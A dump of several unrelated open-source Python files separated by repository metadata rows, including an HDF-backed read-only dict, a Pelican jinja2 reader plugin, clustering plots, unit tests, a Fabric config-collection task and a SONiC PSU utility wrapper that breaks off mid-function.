    add_cache(fileh, cache_root)
    fileh.close()
########################
class Hdf_dict(dict):
    """Lazy, read-only dict-like view over an HDF file written by save2().

    The directory structure is loaded once from the pickled cache in group
    'pytables_cache_v0'; table data is only read from disk when a leaf key
    is accessed.  Mutation is not supported (__setitem__/__delitem__ raise).
    """

    def __init__(self, hdf_file, hdf_dict=None, stack=None):
        # NOTE: the original used mutable default arguments ({} and []),
        # which are shared across calls; None sentinels avoid that pitfall.
        self.hdf_file = hdf_file
        self.stack = stack if stack is not None else []
        if self.stack:
            # sub-view: directory structure is already known
            self.hdf_dict = hdf_dict if hdf_dict is not None else {}
        else:
            # top-level view: load the pickled directory cache from the file
            self.hdf_dict = self.get_cache()
        self.cur_dict = self.hdf_dict

    def get_cache(self):
        """Load and unpickle the directory cache stored by add_cache()."""
        fileh = tables.openFile(self.hdf_file, rootUEP='pytables_cache_v0')
        table = fileh.root.cache0
        total = []
        print('reading')
        begin = time.time()
        for i in table.iterrows():
            total.append(i['col_0'])
        total = ''.join(total)
        # newlines were encoded as chr(1) when the cache was written
        total = total.replace(chr(1), '\n')
        print('loaded cache len= %s %s' % (len(total), time.time() - begin))
        begin = time.time()
        a = cPickle.loads(total)
        print('cache %s' % (time.time() - begin))
        return a

    def has_key(self, k):
        return k in self.cur_dict

    def keys(self):
        return self.cur_dict.keys()

    def get(self, key, default=None):
        """Return self[key], or *default* when the lookup fails."""
        try:
            return self.__getitem__(key)
        except Exception:
            return default

    def items(self):
        return list(self.iteritems())

    def values(self):
        return list(self.itervalues())

    ###########################################
    def __len__(self):
        return len(self.cur_dict)

    def __getitem__(self, k):
        """Return a sub Hdf_dict for group keys, or table data for leaves."""
        if k not in self.cur_dict:
            raise KeyError(k)
        new_stack = self.stack[:]
        new_stack.append(k)
        if self.cur_dict[k]:
            # k names a group with children: return a lazy sub-view
            return Hdf_dict(self.hdf_file, hdf_dict=self.cur_dict[k],
                            stack=new_stack)
        # k names a leaf: read the table stored under the group path
        fileh = tables.openFile(self.hdf_file, rootUEP='/'.join(new_stack))
        for table in fileh.root:
            try:
                # perhaps they stored a single item
                for item in table['scalar']:
                    return item
            except Exception:
                # otherwise they stored a list of data
                try:
                    return [item for item in table['col']]
                except Exception:
                    # list of lists: 'col_depth' records each column's
                    # length; rebuild the columns row by row
                    cur_column = []
                    total_columns = []
                    col_num = 0
                    cur_row = 0
                    num_rows = 0
                    for row in table:
                        if not num_rows:
                            num_rows = row['col_depth']
                        if cur_row == num_rows:
                            cur_row = num_rows = 0
                            col_num += 1
                            total_columns.append(cur_column)
                            cur_column = []
                        cur_column.append(row['col_' + str(col_num)])
                        cur_row += 1
                    total_columns.append(cur_column)
                    return total_columns

    def iterkeys(self):
        # BUGFIX: the original iterated self.iterkeys() here, recursing
        # forever; iterate the cached directory dict instead.
        for key in self.cur_dict:
            yield key

    def __iter__(self):
        return self.iterkeys()

    def itervalues(self):
        for k in self.iterkeys():
            yield self.__getitem__(k)

    def iteritems(self):
        # yield children as (key, value) pairs
        for k in self.iterkeys():
            yield (k, self.__getitem__(k))

    def __repr__(self):
        return '{Hdf dict}'

    def __str__(self):
        return self.__repr__()

    #####
    def setdefault(self, key, default=None):
        try:
            return self.__getitem__(key)
        except Exception:
            # BUGFIX: the original called __setitem__(key) with a missing
            # argument; pass the default (still raises NotImplementedError,
            # since this view is read-only).
            self.__setitem__(key, default)
            return default

    def update(self, d):
        for k, v in d.items():
            self.__setitem__(k, v)

    def popitem(self):
        try:
            # next() builtin instead of the Python-2-only .next() method
            k, v = next(self.iteritems())
            del self[k]
            return k, v
        except StopIteration:
            raise KeyError("Hdf Dict is empty")

    def __setitem__(self, key, value):
        raise NotImplementedError

    def __delitem__(self, key):
        raise NotImplementedError

    def __hash__(self):
        raise TypeError("Hdf dict objects are unhashable")
if __name__=='__main__':
    # Manual smoke test: optionally write a sample file, then read it back.
    def write_small(file=''):
        # sample data covering a flat string list, a list of lists,
        # and nested dicts (groups)
        data1={
            'fred':['a', 'b', 'c'],
            'barney':[[9110, 9130, 9140], [91, 92, 93]],
            'wilma':{'mother':{'pebbles':[22, 23, 24],'bambam':[67, 68, 69]}}
        }
        print 'saving'
        save2(file, data1)
        print 'saved'
    def read_small(file=''):
        # exercise the Hdf_dict read API against the file written above
        #a=make_hdf.Hdf_dict(file)
        a=Hdf_dict(file)
        print a['wilma']
        b=a['wilma']
        for i in b:
            print i
        print a.keys()
        print 'has fred', bool('fred' in a)
        print 'length a', len(a)
        print 'get', a.get('fred'), a.get('not here')
        print 'wilma keys', a['wilma'].keys()
        print 'barney', a['barney']
        print 'get items'
        print a.items()
        for i in a.iteritems():
            print 'item', i
        for i in a.itervalues():
            print i
    # NOTE(review): indentation reconstructed — read is assumed to follow a
    # confirmed write; verify against the original layout.
    a=raw_input('enter y to write out test file to test.hdf')
    if a.strip()=='y':
        print 'writing'
        write_small('test.hdf')
        print 'reading'
        read_small('test.hdf')
| 30.292958 | 112 | 0.505951 | 1,324 | 10,754 | 3.888218 | 0.175227 | 0.023116 | 0.01554 | 0.021756 | 0.227661 | 0.177933 | 0.129759 | 0.113636 | 0.101204 | 0.096737 | 0 | 0.020655 | 0.369723 | 10,754 | 354 | 113 | 30.378531 | 0.738861 | 0.073368 | 0 | 0.284173 | 0 | 0 | 0.057696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.007194 | null | null | 0.071942 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
465234088d4677a447f6bdb4657e058e1a45f5b8 | 2,234 | py | Python | jinja2content.py | firemark/new-site | b7d54320f8e1cfae489108f87f64761ce2510676 | [
"MIT"
] | null | null | null | jinja2content.py | firemark/new-site | b7d54320f8e1cfae489108f87f64761ce2510676 | [
"MIT"
] | null | null | null | jinja2content.py | firemark/new-site | b7d54320f8e1cfae489108f87f64761ce2510676 | [
"MIT"
] | null | null | null | """
jinja2content.py
----------------
DONT EDIT THIS FILE
Pelican plugin that processes Markdown files as jinja templates.
"""
from jinja2 import Environment, FileSystemLoader, ChoiceLoader
import os
from pelican import signals
from pelican.readers import MarkdownReader, HTMLReader, RstReader
from pelican.utils import pelican_open
from tempfile import NamedTemporaryFile
class JinjaContentMixin:
    """Mixin that renders a source file as a jinja2 template before handing
    it to the underlying pelican reader."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # will look first in 'JINJA2CONTENT_TEMPLATES', by default the
        # content root path, then in the theme's templates
        local_dirs = self.settings.get('JINJA2CONTENT_TEMPLATES', ['.'])
        local_dirs = [os.path.join(self.settings['PATH'], folder)
                      for folder in local_dirs]
        theme_dir = os.path.join(self.settings['THEME'], 'templates')

        loaders = [FileSystemLoader(_dir) for _dir
                   in local_dirs + [theme_dir]]
        if 'JINJA_ENVIRONMENT' in self.settings:  # pelican 3.7
            jinja_environment = self.settings['JINJA_ENVIRONMENT']
        else:
            jinja_environment = {
                'trim_blocks': True,
                'lstrip_blocks': True,
                'extensions': self.settings['JINJA_EXTENSIONS']
            }
        self.env = Environment(
            loader=ChoiceLoader(loaders),
            **jinja_environment)

    def read(self, source_path):
        """Render *source_path* through jinja2, then parse the result with
        the base reader.  Returns (content, metadata)."""
        with pelican_open(source_path) as text:
            text = self.env.from_string(text).render()

        # Write the rendered text to a named temp file so the file-based
        # base reader can consume it.  Close the file before re-opening it
        # (required on Windows) and always remove it, even on parse errors.
        with NamedTemporaryFile(delete=False) as f:
            f.write(text.encode())
        try:
            return super().read(f.name)
        finally:
            os.unlink(f.name)
# Concrete readers: render the source through jinja2 first, then parse
# with the corresponding pelican reader.
class JinjaMarkdownReader(JinjaContentMixin, MarkdownReader):
    pass

class JinjaRstReader(JinjaContentMixin, RstReader):
    pass

class JinjaHTMLReader(JinjaContentMixin, HTMLReader):
    pass
def add_reader(readers):
    """Register the jinja2-aware readers for every extension they handle."""
    jinja_readers = (JinjaMarkdownReader, JinjaRstReader, JinjaHTMLReader)
    for reader_cls in jinja_readers:
        for extension in reader_cls.file_extensions:
            readers.reader_classes[extension] = reader_cls
def register():
    # Pelican plugin entry point: install the jinja2 readers at startup.
    signals.readers_init.connect(add_reader)
| 31.027778 | 73 | 0.653984 | 238 | 2,234 | 5.987395 | 0.411765 | 0.050526 | 0.025263 | 0.019649 | 0.057544 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003574 | 0.248433 | 2,234 | 71 | 74 | 31.464789 | 0.845146 | 0.108774 | 0 | 0.06383 | 0 | 0 | 0.063636 | 0.011616 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085106 | false | 0.06383 | 0.12766 | 0 | 0.319149 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4654149e1951b836beb90c90a51fb7d22a7e21c8 | 200 | py | Python | Aulas/12aula(antigo)/readint.py | rafaelmcam/RTOs_ChibiOS | 08d8e21f2c7185d2c47846f67cbfba70c706d689 | [
"MIT"
] | 1 | 2019-05-14T22:31:25.000Z | 2019-05-14T22:31:25.000Z | Aulas/12aula(antigo)/readint.py | rafaelmcam/RTOs_ChibiOS | 08d8e21f2c7185d2c47846f67cbfba70c706d689 | [
"MIT"
] | null | null | null | Aulas/12aula(antigo)/readint.py | rafaelmcam/RTOs_ChibiOS | 08d8e21f2c7185d2c47846f67cbfba70c706d689 | [
"MIT"
] | null | null | null | import serial
with serial.Serial("/dev/ttyUSB0", 115200) as ser:
while 1:
for i in range(5):
n = ser.read()[0]
print("{:x}".format(n))
print("--------")
| 18.181818 | 50 | 0.47 | 26 | 200 | 3.615385 | 0.807692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 0.325 | 200 | 10 | 51 | 20 | 0.622222 | 0 | 0 | 0 | 0 | 0 | 0.120603 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.285714 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46548694a0ea521a51fee1aa569811ccc528f211 | 578 | py | Python | packages/pyre/parsing/Parser.py | avalentino/pyre | 7e1f0287eb7eba1c6d1ef385e5160079283ac363 | [
"BSD-3-Clause"
] | 25 | 2018-04-23T01:45:39.000Z | 2021-12-10T06:01:23.000Z | packages/pyre/parsing/Parser.py | avalentino/pyre | 7e1f0287eb7eba1c6d1ef385e5160079283ac363 | [
"BSD-3-Clause"
] | 53 | 2018-05-31T04:55:00.000Z | 2021-10-07T21:41:32.000Z | packages/pyre/parsing/Parser.py | avalentino/pyre | 7e1f0287eb7eba1c6d1ef385e5160079283ac363 | [
"BSD-3-Clause"
] | 12 | 2018-04-23T22:50:40.000Z | 2022-02-20T17:27:23.000Z | # -*- coding: utf-8 -*-
#
# michael a.g. aïvázis
# orthologue
# (c) 1998-2021 all rights reserved
#
class Parser:
    """
    The base class for parsers

    Subclasses are expected to provide a `lexer` factory; the constructor
    instantiates it to build the parser's scanner.
    """

    # types
    from .exceptions import ParsingError, SyntaxError, TokenizationError

    # meta methods
    def __init__(self, **kwds):
        # chain up
        super().__init__(**kwds)
        # build my scanner by invoking the lexer factory
        self.scanner = self.lexer()
        # all done
        return

    # implementation details
    lexer = None # my scanner factory; must be supplied by subclasses
    scanner = None # my scanner instance, built in __init__
# end of file
| 16.514286 | 72 | 0.595156 | 64 | 578 | 5.25 | 0.78125 | 0.080357 | 0.077381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022388 | 0.304498 | 578 | 34 | 73 | 17 | 0.813433 | 0.420415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4658a352b7ba7209186ef3d47f169f46b8660613 | 2,182 | py | Python | src/visualization/visualize_dataset.py | ivangarrera/MachineLearning | c13584cdcb7c4df1ab2814cf42a3c2bd3c203e75 | [
"MIT"
] | null | null | null | src/visualization/visualize_dataset.py | ivangarrera/MachineLearning | c13584cdcb7c4df1ab2814cf42a3c2bd3c203e75 | [
"MIT"
] | null | null | null | src/visualization/visualize_dataset.py | ivangarrera/MachineLearning | c13584cdcb7c4df1ab2814cf42a3c2bd3c203e75 | [
"MIT"
] | null | null | null | from common_clustering import CommonClustering
#■clustering_features = CommonClustering(r'C:\Users\ivangarrera\Desktop\T2_cleaned.csv')
clustering_features = CommonClustering('D:\Ing. Informatica\Cuarto\Machine Learning\T2_cleaned_gyroscope.csv')
attr = list(clustering_features.data_set)[0][:list(clustering_features.data_set)[0].find('_')]
clustering_features.attr = attr
clustering_features.PrincipalComponentAnalysis(num_components=2)
# Get the number of clusters that provides the best results
ideal_number_of_clusters = clustering_features.getBestNumberOfClusters()
# Plot silhuettes array
clustering_features.PlotSilhouettes()
# Print k-means with the best number of clusters that have been found
labels = clustering_features.KMeansWithIdeal(ideal_number_of_clusters)
# Interprate k-means groups
clustering_features.data_set['labels'] = labels
data_set_labels_mean = clustering_features.data_set.groupby(['labels']).mean()
# Plot 3D graph to interpretate k-means groups
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = Axes3D(fig)
ax.scatter(data_set_labels_mean.values[:,0],
data_set_labels_mean.values[:,1],
data_set_labels_mean.values[:,2])
plt.savefig(r'../../reports/figures/centroids3D_{}.png'.format(attr))
plt.show()
# Agglomerative clustering algorithm using nearest neighbors matrix
clustering_features.AgglomerativeClusteringWithNearestNeighbors()
# DBSCAN Clustering algorithm
labels = clustering_features.DBSCANClustering()
# Interprate outliers
clustering_features.data_set['labels'] = labels
data_set_outliers = clustering_features.data_set.loc[(clustering_features.data_set['labels'] == -1)]
# Show outliers in a 3D graph with all points in the dataset
fig = plt.figure()
ax = Axes3D(fig)
ax.scatter(clustering_features.data_set.values[:,0],
clustering_features.data_set.values[:,1],
clustering_features.data_set.values[:,2])
ax.scatter(data_set_outliers.values[:,0],
data_set_outliers.values[:,1],
data_set_outliers.values[:,2], c='red', s=50)
plt.savefig(r'../../reports/figures/outliers3D_{}.png'.format(attr))
plt.show()
| 36.983051 | 110 | 0.779102 | 284 | 2,182 | 5.764085 | 0.369718 | 0.208919 | 0.134392 | 0.152718 | 0.327428 | 0.129505 | 0.092853 | 0.092853 | 0 | 0 | 0 | 0.012834 | 0.107241 | 2,182 | 58 | 111 | 37.62069 | 0.827002 | 0.219523 | 0 | 0.242424 | 0 | 0 | 0.103428 | 0.08156 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4660b825bf1a5e031627c3620c78b68944deb5c7 | 652 | py | Python | glue/core/tests/test_message.py | ejeschke/glue | 21689e3474aeaeb70e258d76c60755596856976c | [
"BSD-3-Clause"
] | 3 | 2015-09-10T22:23:55.000Z | 2019-04-04T18:47:33.000Z | glue/core/tests/test_message.py | ejeschke/glue | 21689e3474aeaeb70e258d76c60755596856976c | [
"BSD-3-Clause"
] | null | null | null | glue/core/tests/test_message.py | ejeschke/glue | 21689e3474aeaeb70e258d76c60755596856976c | [
"BSD-3-Clause"
] | 1 | 2019-08-04T14:10:12.000Z | 2019-08-04T14:10:12.000Z | from __future__ import absolute_import, division, print_function
import pytest
from .. import message as msg
def test_invalid_subset_msg():
    """SubsetMessage must reject a sender that is not a subset."""
    with pytest.raises(TypeError) as excinfo:
        msg.SubsetMessage(None)
    message = excinfo.value.args[0]
    assert message.startswith('Sender must be a subset')
def test_invalid_data_msg():
    """DataMessage must reject a sender that is not a data object."""
    with pytest.raises(TypeError) as excinfo:
        msg.DataMessage(None)
    message = excinfo.value.args[0]
    assert message.startswith('Sender must be a data')
def test_invalid_data_collection_msg():
    """DataCollectionMessage must reject a sender that is not a DataCollection."""
    with pytest.raises(TypeError) as excinfo:
        msg.DataCollectionMessage(None)
    message = excinfo.value.args[0]
    assert message.startswith('Sender must be a DataCollection')
| 27.166667 | 74 | 0.739264 | 91 | 652 | 5.120879 | 0.384615 | 0.045064 | 0.090129 | 0.122318 | 0.527897 | 0.527897 | 0.527897 | 0.527897 | 0.296137 | 0.296137 | 0 | 0.005525 | 0.167178 | 652 | 23 | 75 | 28.347826 | 0.85267 | 0 | 0 | 0.2 | 0 | 0 | 0.115031 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | true | 0 | 0.2 | 0 | 0.4 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4660df17d48e40efbff3c55617fa7393819b5977 | 1,358 | py | Python | fabfile/config.py | kurochan/config-collector | 656da97eb219eb5bcf913173dd7aa76d0cedd44c | [
"MIT"
] | 1 | 2017-07-30T17:35:10.000Z | 2017-07-30T17:35:10.000Z | fabfile/config.py | kurochan/config-collector | 656da97eb219eb5bcf913173dd7aa76d0cedd44c | [
"MIT"
] | null | null | null | fabfile/config.py | kurochan/config-collector | 656da97eb219eb5bcf913173dd7aa76d0cedd44c | [
"MIT"
] | 1 | 2015-03-01T08:52:14.000Z | 2015-03-01T08:52:14.000Z | # -*- coding: utf-8 -*-
import os
import util
from fabric.api import *
from fabric.state import output
from fabric.colors import *
from base import BaseTask
from helper.print_helper import task_puts
class CollectConfig(BaseTask):
    """
    collect configuration

    Fabric task that fetches the running configuration from the current
    host (env.host) and writes it under ../tmp/config/<host>.txt.
    """
    name = "collect"

    def run_task(self, *args, **kwargs):
        """Fetch the device configuration for env.host and store it."""
        host_config = env.inventory.get_variables(env.host)
        hostname = host_config['ssh_host']
        # skip unreachable hosts (1 s TCP ping on the SSH port)
        if not util.tcping(hostname, 22, 1):
            task_puts("host {0} does not exist. skip...".format(hostname))
            return
        config = self.get_config(hostname, host_config['ssh_user'], host_config['ssh_pass'], host_config['exec_pass'], host_config['type'])
        self.write_config(env.host, config)
        # print config

    def get_config(self, hostname, ssh_user, ssh_pass, exec_pass, os_type):
        """Run the per-OS dump-config shell script and return its output.

        NOTE(review): exec_pass is accepted but not passed to the script —
        confirm whether the helper script needs the enable password.
        """
        script_name = "dump-config-cisco-{0}.sh".format(os_type)
        config = local(os.path.dirname(os.path.abspath(__file__)) + "/../bin/{0} {1} {2} {3}".format(script_name, ssh_user, hostname, ssh_pass), capture = True)
        return config

    def write_config(self, hostname, config):
        """Write *config* to ../tmp/config/<hostname>.txt, creating the dir."""
        output_dir = os.path.dirname(os.path.abspath(__file__)) + "/../tmp/config"
        local("mkdir -p {0}".format(output_dir))
        # BUGFIX: use a context manager so the handle is always closed
        # (the original leaked it on error and shadowed the `file` builtin).
        with open("{0}/{1}.txt".format(output_dir, hostname), 'w') as config_file:
            config_file.write(str(config))

collect = CollectConfig()
| 33.121951 | 156 | 0.690722 | 194 | 1,358 | 4.634021 | 0.386598 | 0.077864 | 0.043382 | 0.046719 | 0.066741 | 0.066741 | 0.066741 | 0 | 0 | 0 | 0 | 0.011314 | 0.153903 | 1,358 | 40 | 157 | 33.95 | 0.771105 | 0.041973 | 0 | 0 | 0 | 0 | 0.125 | 0.018634 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0.107143 | 0.25 | 0 | 0.5 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4661333ffeca10b7026c68a47b44fc3be83ff093 | 2,334 | py | Python | python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py | LWhite027/PaddleBox | b14bcdf285dd8829e11ab12cc815ac1b1ab62694 | [
"Apache-2.0"
] | 10 | 2021-05-12T07:20:32.000Z | 2022-03-04T08:21:56.000Z | python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py | AFLee/Paddle | 311b3b44fc7d51d4d66d90ab8a3fc0d42231afda | [
"Apache-2.0"
] | 1 | 2020-09-10T09:05:52.000Z | 2020-09-10T09:06:22.000Z | python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py | AFLee/Paddle | 311b3b44fc7d51d4d66d90ab8a3fc0d42231afda | [
"Apache-2.0"
] | 25 | 2019-12-07T02:14:14.000Z | 2021-12-30T06:16:30.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
from inference_pass_test import InferencePassTest
import paddle.fluid as fluid
import paddle.fluid.core as core
from paddle.fluid.core import AnalysisConfig
class TransposeFlattenConcatFusePassTRTTest(InferencePassTest):
    """Exercises the TensorRT transpose_flatten_concat fuse pass on a
    transpose -> flatten -> concat subgraph."""

    def setUp(self):
        # Build a small program: two inputs are transposed, flattened and
        # concatenated.
        with fluid.program_guard(self.main_program, self.startup_program):
            data1 = fluid.data(
                name="data1", shape=[8, 32, 128], dtype="float32")
            data2 = fluid.data(
                name="data2", shape=[8, 32, 128], dtype="float32")
            trans1 = fluid.layers.transpose(data1, perm=[2, 1, 0])
            trans2 = fluid.layers.transpose(data2, perm=[2, 1, 0])
            flatt1 = fluid.layers.flatten(trans1)
            flatt2 = fluid.layers.flatten(trans2)
            concat_out = fluid.layers.concat([flatt1, flatt2])
            # There is no parameters for above structure.
            # Hence, append a batch_norm to avoid failure caused by load_combined.
            out = fluid.layers.batch_norm(concat_out, is_test=True)

        # Random inputs matching the declared shapes.
        self.feeds = {
            "data1": np.random.random([8, 32, 128]).astype("float32"),
            "data2": np.random.random([8, 32, 128]).astype("float32")
        }
        self.enable_trt = True
        # TensorRT params: 1 MiB workspace, max batch 8, min subgraph size 3,
        # FP32 precision, no static engine, no INT8 calibration.
        self.trt_parameters = TransposeFlattenConcatFusePassTRTTest.TensorRTParam(
            1 << 20, 8, 3, AnalysisConfig.Precision.Float32, False, False)
        self.fetch_list = [out]

    def test_check_output(self):
        # There is no cpu pass for transpose_flatten_concat_fuse
        if core.is_compiled_with_cuda():
            use_gpu = True
            self.check_output_with_option(use_gpu)
# Standard unittest entry point when executed directly.
if __name__ == "__main__":
    unittest.main()
| 40.947368 | 83 | 0.673522 | 303 | 2,334 | 5.072607 | 0.481848 | 0.039037 | 0.015615 | 0.02082 | 0.072869 | 0.072869 | 0.042941 | 0.042941 | 0 | 0 | 0 | 0.038462 | 0.231362 | 2,334 | 56 | 84 | 41.678571 | 0.818283 | 0.322622 | 0 | 0 | 0 | 0 | 0.035806 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0.090909 | 0.181818 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4662eb3534b543f9d1857e55e3d0e8669cf078e7 | 9,315 | py | Python | pddf_psuutil/main.py | deran1980/sonic-utilities | a6ae218238e7e552f49191f81451bd55ff56ba51 | [
"Apache-2.0"
] | null | null | null | pddf_psuutil/main.py | deran1980/sonic-utilities | a6ae218238e7e552f49191f81451bd55ff56ba51 | [
"Apache-2.0"
] | 4 | 2020-04-17T06:53:05.000Z | 2020-12-01T02:37:34.000Z | pddf_psuutil/main.py | deran1980/sonic-utilities | a6ae218238e7e552f49191f81451bd55ff56ba51 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#
# main.py
#
# Command-line utility for interacting with PSU Controller in PDDF mode in SONiC
#
try:
import sys
import os
import click
from tabulate import tabulate
from utilities_common.util_base import UtilHelper
except ImportError as e:
raise ImportError("%s - required module not found" % str(e))
VERSION = '2.0'
SYSLOG_IDENTIFIER = "psuutil"
PLATFORM_SPECIFIC_MODULE_NAME = "psuutil"
PLATFORM_SPECIFIC_CLASS_NAME = "PsuUtil"
# Global platform-specific psuutil class instance
platform_psuutil = None
platform_chassis = None
# Wrapper APIs so that this util is suited to both 1.0 and 2.0 platform APIs
# Each wrapper prefers the platform 2.0 chassis object and falls back to
# the legacy 1.0 plugin (or a synthesized value) when the 2.0 call is
# absent or unimplemented.  PSU indices are 1-based at this layer; the
# 2.0 API is 0-based, hence the idx - 1 conversions.

def _wrapper_get_num_psus():
    """Total number of PSUs on the device."""
    if platform_chassis is None:
        return platform_psuutil.get_num_psus()
    try:
        return platform_chassis.get_num_psus()
    except NotImplementedError:
        return platform_psuutil.get_num_psus()

def _wrapper_get_psu_name(idx):
    """Name of PSU *idx*; synthesized when the 2.0 call is unavailable."""
    if platform_chassis is not None:
        try:
            return platform_chassis.get_psu(idx - 1).get_name()
        except NotImplementedError:
            pass
    return "PSU {}".format(idx)

def _wrapper_get_psu_presence(idx):
    """Presence flag of PSU *idx*."""
    if platform_chassis is None:
        return platform_psuutil.get_psu_presence(idx)
    try:
        return platform_chassis.get_psu(idx - 1).get_presence()
    except NotImplementedError:
        return platform_psuutil.get_psu_presence(idx)

def _wrapper_get_psu_status(idx):
    """Operational status of PSU *idx*."""
    if platform_chassis is None:
        return platform_psuutil.get_psu_status(idx)
    try:
        return platform_chassis.get_psu(idx - 1).get_status()
    except NotImplementedError:
        return platform_psuutil.get_psu_status(idx)

def _wrapper_get_psu_model(idx):
    """Model string of PSU *idx*."""
    if platform_chassis is None:
        return platform_psuutil.get_model(idx)
    try:
        return platform_chassis.get_psu(idx - 1).get_model()
    except NotImplementedError:
        return platform_psuutil.get_model(idx)

def _wrapper_get_psu_mfr_id(idx):
    """Manufacturer id of PSU *idx*."""
    if platform_chassis is None:
        return platform_psuutil.get_mfr_id(idx)
    try:
        return platform_chassis.get_psu(idx - 1).get_mfr_id()
    except NotImplementedError:
        return platform_psuutil.get_mfr_id(idx)

def _wrapper_get_psu_serial(idx):
    """Serial number of PSU *idx*."""
    if platform_chassis is None:
        return platform_psuutil.get_serial(idx)
    try:
        return platform_chassis.get_psu(idx - 1).get_serial()
    except NotImplementedError:
        return platform_psuutil.get_serial(idx)

def _wrapper_get_psu_direction(idx):
    """Airflow direction of PSU *idx*'s first fan."""
    if platform_chassis is None:
        return platform_psuutil.get_direction(idx)
    try:
        return platform_chassis.get_psu(idx - 1)._fan_list[0].get_direction()
    except NotImplementedError:
        return platform_psuutil.get_direction(idx)
def _wrapper_get_output_voltage(idx):
    """Output voltage of PSU *idx* (1-based)."""
    if platform_chassis is None:
        return platform_psuutil.get_output_voltage(idx)
    try:
        return platform_chassis.get_psu(idx - 1).get_voltage()
    except NotImplementedError:
        return platform_psuutil.get_output_voltage(idx)

def _wrapper_get_output_current(idx):
    """Output current of PSU *idx* (1-based)."""
    if platform_chassis is None:
        return platform_psuutil.get_output_current(idx)
    try:
        return platform_chassis.get_psu(idx - 1).get_current()
    except NotImplementedError:
        return platform_psuutil.get_output_current(idx)

def _wrapper_get_output_power(idx):
    """Output power of PSU *idx* (1-based)."""
    if platform_chassis is None:
        return platform_psuutil.get_output_power(idx)
    try:
        return platform_chassis.get_psu(idx - 1).get_power()
    except NotImplementedError:
        return platform_psuutil.get_output_power(idx)

def _wrapper_get_fan_rpm(idx, fan_idx):
    """RPM of fan *fan_idx* (1-based) of PSU *idx* (1-based)."""
    if platform_chassis is None:
        return platform_psuutil.get_fan_rpm(idx, fan_idx)
    try:
        return platform_chassis.get_psu(idx - 1)._fan_list[fan_idx - 1].get_speed_rpm()
    except NotImplementedError:
        return platform_psuutil.get_fan_rpm(idx, fan_idx)

def _wrapper_dump_sysfs(idx):
